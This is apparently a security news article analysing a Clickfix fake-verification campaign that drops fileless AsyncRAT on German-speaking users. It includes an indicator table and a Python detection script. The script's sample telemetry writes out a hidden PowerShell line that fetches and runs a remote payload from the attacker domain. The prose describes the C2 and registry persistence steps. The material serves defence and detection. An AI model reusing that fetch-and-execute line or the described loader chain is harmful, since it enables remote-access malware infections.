Hackers Use Fake Verification Prompt and Clickfix Technique to Deploy Fileless AsyncRAT

Threat actors are employing cunning strategies to disseminate a fileless variant of AsyncRAT, a well-known remote access Trojan. This operation was uncovered during a routine analysis of attacker infrastructure, revealing a deceptive mechanism that utilizes a fake verification prompt inspired by the “Clickfix” technique. This tactic is designed to mislead users into executing harmful commands.

The campaign appears to specifically target German-speaking individuals, as indicated by the language used in the prompt. By leveraging obfuscated PowerShell scripts and executing commands in memory, the malware is deployed without ever creating files on disk, presenting a considerable challenge for conventional antivirus solutions.

Deceptive Campaign Targets German-Speaking Users

The attack initiates when victims stumble upon a seemingly benign verification page that prompts them to click “I’m not a robot.” Upon their interaction, a malicious command is surreptitiously copied to their clipboard, accompanied by the German phrase “Drücke enter um deine identität zu bestätigen!” (Press enter to confirm your identity!).

As reported by CloudSEK, this command employs the legitimate Windows utility conhost.exe to initiate a hidden PowerShell instance with flags such as -w hidden and -nop. This instance executes a payload retrieved from a remote server (http://namoet[.]de:80/x).

The script decodes an obfuscated base64 string, establishing a connection to a command-and-control (C2) server located at namoet[.]de:4444. It then compiles reversed C# code in memory using Add-Type. This sophisticated approach ensures persistence through registry keys like HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, enabling full remote control, credential theft, and data exfiltration while evading detection by file-based mechanisms.

Sophisticated Fileless Malware

Technical analysis reveals that AsyncRAT employs signature tactics, including the use of PowerShell for stealth execution (MITRE T1059.001), in-memory C# compilation (T1127.001), and TCP-based C2 communication over non-standard ports such as 4444 (T1571). The payload establishes persistence by embedding commands in registry paths and utilizes advanced obfuscation techniques, including reversed strings and reflective loading, to complicate analysis.

Once activated, the malware redirects standard input/output for command execution, allowing attackers to maintain covert access over extended periods. This campaign, which may have been active since at least April 2025 based on associated infrastructure, highlights the increasing sophistication of fileless malware delivery.

To mitigate this threat, organizations should focus on several key strategies: blocking suspicious PowerShell executions through EDR or AppLocker, enforcing network segmentation to filter egress traffic to known C2 domains, and monitoring registry changes for unauthorized persistence mechanisms. Implementing PowerShell Constrained Language Mode and enabling script logging can further assist in detecting obfuscated code, while memory scanning with tailored YARA rules provides a proactive defense against in-memory payloads.
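The detection side of those recommendations can be expressed as a few host-telemetry rules. The following is an added example, not code from CloudSEK or the original article: it runs three rules over constructed Sysmon-style events (process creation, registry value set, network connection) that mirror the behaviours described above, namely a hidden, no-profile PowerShell launched through conhost.exe, a Run/RunOnce value that launches PowerShell, and PowerShell egress on a non-standard port.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (Sysmon-style events reduced to the fields the
# rules need). These are not real captured logs; values echo the article's IOCs.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "image": "powershell.exe", "parent": "conhost.exe",
     "cmd": 'powershell -w hidden -nop -c "iwr http://namoet[.]de:80/x | iex"'},
    {"id": 1, "image": "powershell.exe", "parent": "cmd.exe",
     "cmd": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"id": 13, "image": "powershell.exe",
     "target": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windows",
     "details": "powershell -w hidden -nop -c ..."},
    {"id": 13, "image": "msiexec.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Program Files\App\updater.exe"},
    {"id": 3, "image": "powershell.exe", "dest": "109.250.111.155", "port": 4444},
    {"id": 3, "image": "powershell.exe", "dest": "13.107.42.14", "port": 443},
]

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)    # -w hidden
NOPROFILE = re.compile(r"-nop(?:rofile)?\b", re.I)          # -nop
AUTORUN = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
EXPECTED_PORTS = {80, 443}  # ports PowerShell is normally allowed to reach

def check_event(ev: Dict[str, object]) -> List[str]:
    """Return the names of the rules this single event matches (empty if benign)."""
    hits: List[str] = []
    if ev["id"] == 1:  # process creation
        cmd = str(ev["cmd"])
        via_conhost = "conhost.exe" in (str(ev["image"]) + str(ev["parent"])).lower()
        if via_conhost and "powershell" in cmd.lower() \
                and HIDDEN.search(cmd) and NOPROFILE.search(cmd):
            hits.append("T1059.001 hidden PowerShell launched via conhost.exe")
    elif ev["id"] == 13:  # registry value set
        if AUTORUN.search(str(ev["target"])) and "powershell" in str(ev["details"]).lower():
            hits.append("Run/RunOnce persistence value launching PowerShell")
    elif ev["id"] == 3:  # network connection
        if "powershell" in str(ev["image"]).lower() and int(ev["port"]) not in EXPECTED_PORTS:
            hits.append(f"T1571 PowerShell egress on non-standard port {ev['port']}")
    return hits

def scan(events: List[Dict[str, object]]) -> List[tuple]:
    """Run every rule over every event; yields (event index, rule name) pairs."""
    return [(i, h) for i, ev in enumerate(events) for h in check_event(ev)]

if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {hit}")
```

Only the three malicious events (indexes 0, 2 and 4) fire; the scripted backup, the installer's Run entry and the HTTPS connection pass cleanly, which is the false-positive check worth keeping when tuning these rules for real telemetry.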

Indicators of Compromise (IOCs)

| Indicator Type | Value | Use |
|---|---|---|
| IP | 109.250.111[.]155 | Clickfix delivery |
| FQDN | namoet[.]de | Clickfix / C2 server |
| Port | 4444 TCP | Reverse shell listener |
| URL | hxxp[:]//namoet[.]de:80/x | PowerShell payload |
| Registry (HKCU) | SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windows | Persistence on boot |
| Registry (HKCU) | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\win | Holds obfuscated command |

